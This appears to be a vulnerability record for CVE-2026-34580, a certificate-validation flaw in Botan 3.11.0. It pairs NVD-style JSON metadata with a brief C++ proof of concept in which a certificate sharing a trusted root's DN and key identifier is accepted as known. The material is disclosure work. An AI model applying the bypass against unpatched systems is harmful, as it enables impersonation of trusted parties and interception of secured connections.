CVE-2026-34580

// Conceptual PoC for demonstrating the logic flaw in Botan 3.11.0 // This code simulates the behavior where a non-identical certificate // is accepted because DN and SKI match. #include <botan/certstor.h> #include <botan/x509cert.h> #include <iostream> int main() { // Load a trusted root certificate (e.g., RootCA) auto trusted_root = Botan::X509_Certificate("trusted_root.pem"); // Create a Certificate_Store containing the root Botan::Certificate_Store_In_Memory cert_store; cert_store.add_certificate(trusted_root); // Attacker creates a malicious End Entity (EE) certificate // with the SAME DN and SKI as the trusted root, but different keys. // In a real attack, this cert would be generated by the attacker. auto malicious_ee = Botan::X509_Certificate("malicious_ee_same_dn.pem"); // Vulnerable check in Botan 3.11.0 // The function 'certificate_known' checks DN/SKI match, not identity. bool is_known = cert_store.certificate_known(malicious_ee); if (is_known) { std::cout << "[!] Vulnerability Triggered: Malicious certificate accepted as trusted!" << std::endl; std::cout << " The library mistakenly believes the EE cert is the Root CA." << std::endl; } else { std::cout << "[+] Safe: Certificate correctly rejected." << std::endl; } return 0; }

{"cve": {"id": "CVE-2026-34580", "sourceIdentifier": "[email protected]", "published": "2026-04-07T22:16:22.647", "lastModified": "2026-04-17T20:30:02.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Botan is a C++ cryptography library. In 3.11.0, the function Certificate_Store::certificate_known had a misleading name; it would return true if any certificate in the store had a DN (and subject key identifier, if set) matching that of the argument. It did not check that the cert it found and the cert it was passed were actually the same certificate. In 3.11.0 an extension of path validation logic was made which assumed that certificate_known only returned true if the certificates were in fact identical. The impact is that if an end entity certificate is presented, and its DN (and subject key identifier, if set) match that of any trusted root, the end entity certificate is accepted immediately as if it itself were a trusted root. , This vulnerability is fixed in 3.11.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:botan_project:botan:3.11.0:*:*:*:*:*:*:*", "matchCriteriaId": "6EEE0045-C0B8-4412-A171-138CB5039475"}]}]}], "references": [{"url": "https://github.com/randombit/botan/security/advisories/GHSA-v782-6fq4-q827", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}